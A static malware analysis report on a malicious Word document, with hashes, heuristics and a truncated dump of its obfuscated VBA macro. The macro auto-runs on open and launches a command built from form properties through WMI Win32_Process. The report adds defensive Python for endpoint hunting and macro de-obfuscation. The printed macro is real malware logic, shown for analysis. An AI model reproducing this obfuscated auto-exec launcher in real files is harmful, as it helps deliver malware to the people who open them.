Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7569c44f5d04fef2…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 141.8 KB
Created: 2019-05-08 13:49:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: fd2ce2212a4b589b2c34359cd57086bb
SHA-1: b68e0d19cb7bc4c299e74b0dc517b9687e033fa0
SHA-256: 7569c44f5d04fef27c5b9be4b22eee2f5f81edb46857e077255f4d593cf09d33
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1059 Command and Scripting Interpreter
  • T1137.001 Office Application Startup: Office Template Macros

The sample is a Word document (OLE/CFB container) carrying VBA macros. The critical heuristic OLE_VBA_WMI_PROCESS_CREATE fires because the macro binds to the WMI Win32_Process class through GetObject and uses it to start a command, a common way for a maldoc to launch its next stage without the spawned process having WINWORD.EXE as its parent. The decoded source (macros.bas, below) shows the expected obfuscation: the moniker is split into "win" + "mg" + "mts:W" + "in32_Pro" + "cess" across line continuations, the string t3239169 assembled immediately before the WMI call is built from UserForm control properties (PasswordChar, ControlTipText, ControlSource) and other form members rather than appearing as a literal, and the real statements are padded with While ... Wend loops whose bodies are only random comments. The autoopen procedure means the chain runs as soon as macros are enabled for the document. The preview is truncated at the w03423.C member call, so the full command line is not recovered in this report.
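What the WMI launch looks like on the endpoint, as an added example that is not part of this report: a Win32_Process.Create call is serviced by the WMI provider host, so the new process is a child of WmiPrvSE.exe rather than of WINWORD.EXE, and a rule that only looks for Office spawning cmd.exe or powershell.exe misses it. The Python below scores process-creation events (a subset of Sysmon Event ID 1 fields) for both shapes and downgrades a WmiPrvSE.exe child when no Office launch by the same user precedes it. The events, the image lists and the five-minute correlation window are constructed assumptions for the example, not data from this sample's detonation.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

# Assumptions for the example: which images count as Office hosts, which count
# as the script/utility hosts a macro typically launches, and how long after an
# Office launch a WMI-spawned child is still attributed to it.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
CORRELATION_WINDOW = timedelta(minutes=5)


@dataclass
class ProcEvent:
    """Subset of the Sysmon Event ID 1 (process creation) fields used here."""
    utc_time: datetime
    image: str
    parent_image: str
    command_line: str
    user: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def hunt(events):
    """Return (event, reason, severity) for process starts worth a look.

    Two shapes are flagged: a script host whose parent is an Office app (the
    classic maldoc rule) and a script host whose parent is WmiPrvSE.exe, which
    is what Win32_Process.Create produces. The WMI shape is only high severity
    when the same user started an Office app shortly before; WmiPrvSE also
    launches processes for management agents, so on its own it is noisy.
    """
    hits = []
    last_office_start = {}            # user -> time of most recent Office launch
    for ev in sorted(events, key=lambda e: e.utc_time):
        child, parent = basename(ev.image), basename(ev.parent_image)
        if child in OFFICE_APPS:
            last_office_start[ev.user] = ev.utc_time
            continue
        if child not in SCRIPT_HOSTS:
            continue
        if parent in OFFICE_APPS:
            hits.append((ev, "office_direct_child", "high"))
        elif parent == "wmiprvse.exe":
            seen = last_office_start.get(ev.user)
            if seen is not None and ev.utc_time - seen <= CORRELATION_WINDOW:
                hits.append((ev, "wmi_spawned_after_office", "high"))
            else:
                hits.append((ev, "wmi_spawned_no_office_context", "low"))
    return hits


# Constructed events (not from the sample's detonation): a user opens a document,
# 12 s later cmd.exe appears under WmiPrvSE.exe for that user, then powershell.exe
# appears directly under WINWORD.EXE, and hours later an unrelated SYSTEM child
# shows up under WmiPrvSE.exe. Command lines are placeholders.
T0 = datetime(2019, 5, 31, 9, 14, 0)
OFFICE16 = r"C:\Program Files\Microsoft Office\Office16"
SAMPLE_EVENTS = [
    ProcEvent(T0, OFFICE16 + r"\WINWORD.EXE", r"C:\Windows\explorer.exe",
              '"WINWORD.EXE" /n "C:\\Users\\alice\\Downloads\\doc.doc"', r"CORP\alice"),
    ProcEvent(T0 + timedelta(seconds=12), r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\wbem\WmiPrvSE.exe", "cmd.exe /c <constructed>", r"CORP\alice"),
    ProcEvent(T0 + timedelta(seconds=40), r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              OFFICE16 + r"\WINWORD.EXE", "powershell.exe -nop -w hidden <constructed>", r"CORP\alice"),
    ProcEvent(T0 + timedelta(hours=3), r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\wbem\WmiPrvSE.exe", "cmd.exe /c <constructed>", r"NT AUTHORITY\SYSTEM"),
]

if __name__ == "__main__":
    for ev, reason, sev in hunt(SAMPLE_EVENTS):
        print(f"{ev.utc_time:%H:%M:%S} {sev:4} {reason:32} "
              f"{basename(ev.parent_image)} -> {basename(ev.image)} [{ev.user}]")
```

The user-based correlation assumes the telemetry attributes the WMI-created child to the calling user, which is the case for a local Win32_Process.Create call; if your EDR records the WmiPrvSE.exe service account instead, correlate on host and time window alone and expect more noise.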

Heuristics (7)

  • [critical] CLAMAV_DETECTION: ClamAV signature Doc.Malware.Smpowloadbb-6965612-0
    ClamAV detected this file as malware: Doc.Malware.Smpowloadbb-6965612-0
  • [medium] OLE_VBA_MACROS: VBA macros detected (3 related findings)
    Document contains VBA macro code.
  • [critical] OLE_VBA_WMI_PROCESS_CREATE: VBA WMI Win32_Process launcher
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain; the class name is often hidden through string concatenation or helper functions, as it is here ("win" + "mg" + "mts:W" + "in32_Pro" + "cess" in V0001425 below).
  • [high] OLE_VBA_AUTOOPEN: AutoOpen macro
    The project defines Sub autoopen, which Word runs when the document is opened with macros enabled.
  • [high] OLE_VBA_GETOBJ: GetObject call
    GetObject() is used to bind to the WMI moniker. On its own it is only a COM automation call; combined with the moniker above it is the process launcher.
  • [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: Legacy WordBasic auto-exec macro marker
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this generic description conflicts with OLE_VBA_MACROS above and with the decoded macros.bas artifact below: a VBA project was recovered from this sample, so treat the marker as redundant evidence of the AutoOpen entry point rather than as an independent finding.
  • [info] EMBEDDED_URL: Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the OOXML DrawingML namespace identifier that Office writes into embedded drawing and picture parts; it is not contacted at runtime and is not an indicator of compromise.
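The check that OLE_VBA_WMI_PROCESS_CREATE, OLE_VBA_AUTOOPEN and OLE_VBA_GETOBJ describe, as an added example that is not the report's own scanner: a Python triage function that undoes the three obfuscation layers visible in the extracted macro (` _` line continuations, comment-only While/Wend padding, and "a" + "b" literal splitting), then reports the auto-exec entry point, the GetObject call, the reassembled winmgmts:Win32_Process moniker, and which UserForm control properties a string is built from. The input is a constructed excerpt that keeps the identifiers from macros.bas below; its final .Create line is added to exercise the check, since the preview on this page is cut off at w03423.C.

```python
import re

# Auto-exec procedure names Word/Excel run on open (not exhaustive).
AUTOEXEC = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+"
    r"(AutoOpen|AutoExec|AutoClose|AutoExit|AutoNew|Document_Open|Workbook_Open)\s*\(",
    re.IGNORECASE | re.MULTILINE,
)
STR_CONCAT = re.compile(r'"([^"]*)"\s*[+&]\s*"([^"]*)"')          # "a" + "b"  ->  "ab"
DEAD_LOOP = re.compile(r"^[ \t]*While\b[^\n]*\n[ \t]*Wend[^\n]*\n",
                       re.IGNORECASE | re.MULTILINE)              # loop with no statements
WMI_MONIKER = re.compile(r'"winmgmts:[^"]*win32_process"', re.IGNORECASE)
DOTTED = re.compile(r"^[A-Za-z_]\w*(?:\.[A-Za-z_]\w*)+$")         # module.control.property

# Constructed excerpt in the shape of macros.bas (identifiers copied from it).
# The .Create line is not in the truncated preview; it is added here so the
# check has something to find.
SAMPLE_VBA = r'''
Sub _
autoopen()
On Error Resume Next
         While Y0329034 And W903_3
'N_36534Q475_796w346169i36679_4
'X_922_w632988w52_70X00_71
      Wend
Call V0001425
End Sub

Function V0001425()
On Error Resume Next
t3239169 = w22673.c85765_.PasswordChar + p21593.s51328 + w22673.c85765_.ControlTipText + p21593.T9062956
Set w03423 = Q3353823(GetObject("win" + "mg" _
+ "mts:W" _
+ "in32_Pro" + "cess"))
w03423.Create t3239169, Null, Null, w_pid
End Function
'''


def normalize_vba(src: str) -> str:
    """Undo the obfuscation layers seen in the extracted macro; return clean source."""
    # 1. drop full-line comments: the random-identifier padding inside the loops
    lines = [l for l in src.splitlines() if not l.lstrip().startswith("'")]
    src = "\n".join(lines) + "\n"
    # 2. join ` _` line continuations, so `Sub _` / `autoopen()` is one statement
    src = re.sub(r"[ \t]+_[ \t]*\r?\n[ \t]*", " ", src)
    # 3. fold "a" + "b" literal chains into one literal, repeating until stable
    #    (doubled-quote escapes inside literals are not handled; the sample has none)
    prev = None
    while prev != src:
        prev, src = src, STR_CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), src)
    # 4. remove While ... Wend loops that are now empty (they never held real code)
    prev = None
    while prev != src:
        prev, src = src, DEAD_LOOP.sub("", src)
    return src


def triage(src: str) -> dict:
    """Report OLE_VBA_*-style findings for one decoded VBA dump."""
    norm = normalize_vba(src)
    getobj = re.search(r"\bGetObject\s*\(", norm, re.IGNORECASE) is not None
    moniker = WMI_MONIKER.search(norm)
    create = re.search(r"\b(\w+)\s*\.\s*Create\b", norm, re.IGNORECASE)
    # Strings assembled from `+` chains of dotted names (UserForm control
    # properties): the command line lives there, not in a string literal.
    built = {}
    for target, rhs in re.findall(r"^[ \t]*(\w+)[ \t]*=[ \t]*(.+)$", norm, re.MULTILINE):
        parts = [p.strip() for p in rhs.split("+")]
        if len(parts) > 1 and all(DOTTED.match(p) for p in parts):
            built[target] = parts
    return {
        "autoexec": [m.group(1) for m in AUTOEXEC.finditer(norm)],
        "getobject": getobj,
        "wmi_moniker": moniker.group(0).strip('"') if moniker else None,
        "create_on": create.group(1) if create else None,
        "wmi_process_create": bool(moniker and getobj and create),
        "property_built_strings": built,
        "normalized": norm,
    }


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    print(result["normalized"])
    for key, value in result.items():
        if key != "normalized":
            print(f"{key}: {value}")
```

The property_built_strings entry is the analyst's to-do list: the listed UserForm control properties (PasswordChar, ControlTipText and friends on the w22673 and p21593 forms) must be read out of the OLE form streams to recover the actual command line, which a plain string-literal scan of the VBA source will never show.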

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6747 bytes
SHA-256: 46fafa4706f53f4aeb75609e9fa505701391a177d5089ba9b7d3844d8bf04b54

Preview: first 1,000 lines of the extracted script (the dump is cut off at the end of the preview)
Attribute VB_Name = "Z74186"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "w22673"
Attribute VB_Base = "0{EE749F86-F1A1-404C-BADD-4CB7021EB7F0}{0730E178-EC20-41FD-809E-CFF6CC65A68C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "q25131_"

Attribute VB_Name = "p291855"

Attribute VB_Name = "p21593"
Attribute VB_Base = "0{81CF2846-C84D-44B3-B2A7-367212CCF2A7}{7CD0F323-4443-4284-8822-81079536DA65}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "a40085"
Function Q3353823(j1_0276)
         While Z70179 And G188_5
'U08466G544319z38929p74509
'Q_9088Y_358_1i_203310t9_4743_
'A43344R707273L18817_2j826102
      Wend
         While Q75518 And M754993
'G3982_4N3_3720f281337W35874
'j_53710X7_1359R011729S3787336
'J120709O3984_O7545_J99_909
      Wend
         While H127_4 And c8161878
'b7246616X002234w4568490w9_641
'q7766214w4956036Z_8834a5717466
'r4548__a4239_5v_339393j6__8989
      Wend
Set Q3353823 = CVar(j1_0276)
         While A55618 And i40325_
'R026_984J611_92O72057r52165
'p2617929C83_51I13_8_0w1581332
'N866474q0_2_03r572__2S_519950
      Wend
         While k455_33 And h39438
'i_4909j94982F33503U0192497
'u2700743t086073h556651C5_9084
'M5817__L707192b826000a2__2811
      Wend
         While W37120_ And P4114092
'u077596_d6460_67k4_717l6_9512
'h237_225j25434c01693R_9134
'u56893Q7_443O978925l037893
      Wend
End Function
Sub _
autoopen()
On Error Resume Next
         While Y0329034 And W903_3
'N_36534Q475_796w346169i36679_4
'X_922_w632988w52_70X00_71
'a97222A00666s7_04102i23646
      Wend
         While u8_7814 And V37718
'v60796v694834l70266B70756
'z5970231Z6362077R15113A9618680
'J749091b5__03z186855N598944
      Wend
Call V0001425
         While T7888_1 And B870974
'j_42075X96432S494747i74732
'A533813f8286662Q4_88_91h3798392
'R68_8_1E05135l64__5V24138
      Wend
         While F6396342 And b2_5321
'm9__6978h042143n9865367M298_1
'b91071a2_02_6G1368_h130252
'k09_37l4740386z989905_l499914
      Wend
End Sub


Attribute VB_Name = "i971_9_"
Function V0001425()
On Error Resume Next
         While G706634 And i_348413
'U780_61c638603D06475G540_031
'V8__53V538556m02143j7777_7
'r1326351f51_41M0_26_6O_068377
      Wend
         While z256034 And I3850_
'D7626388Y003987_w8_86599r08850
'V_89460u61004S80725_2d2300217
'I550_3Y6_760h04798P51_809
      Wend
         While o984308_ And v11298_
'w550_81n14645C85_1_q370632
'f5508722R15982M37_576Z086077
'c34130a555_807R8_0562u85501
      Wend
t3239169 = w22673.c85765_.PasswordChar + p21593.s51328 + w22673.c85765_.ControlTipText + p21593.T9062956 + w22673.c85765_.ControlTipText + w22673.c85765_.ControlSource + p21593.N956516 + w22673.c85765_.ControlSource + w22673.c85765_.ControlSource + p21593.I36286 + w22673.c85765_.PasswordChar + p21593.p322885 + w22673.c85765_.ControlSource
         While W5296121 And O1070_
'W7013950E73024B78_05X84558
'F6053548v8050618K59571c3955597
'A8416_S1904990p6031723N574_08
      Wend
         While j00389 And V_296494
'p_6001A_90306L80913G9012985
'T98_9449b83452Q6991_9S03268
'P53076S55678_3C18993z03_11
      Wend
Set w03423 = Q3353823(GetObject("win" + "mg" _
+ "mts:W" _
+ "in32_Pro" + "cess"))
         While C357636 And w6127_
'f59652Q4270_w390864K_40165_
'A_181932n41753z61178O53097
's70781X01_085P__9_5s69__73
      Wend
         While b454240 And k60476
'd60048K33961_9o693591R8_628
'J09387E8507627I7412925N92139
'z2205341i96445w28_131S7570937
      Wend
w03423.C
... (truncated)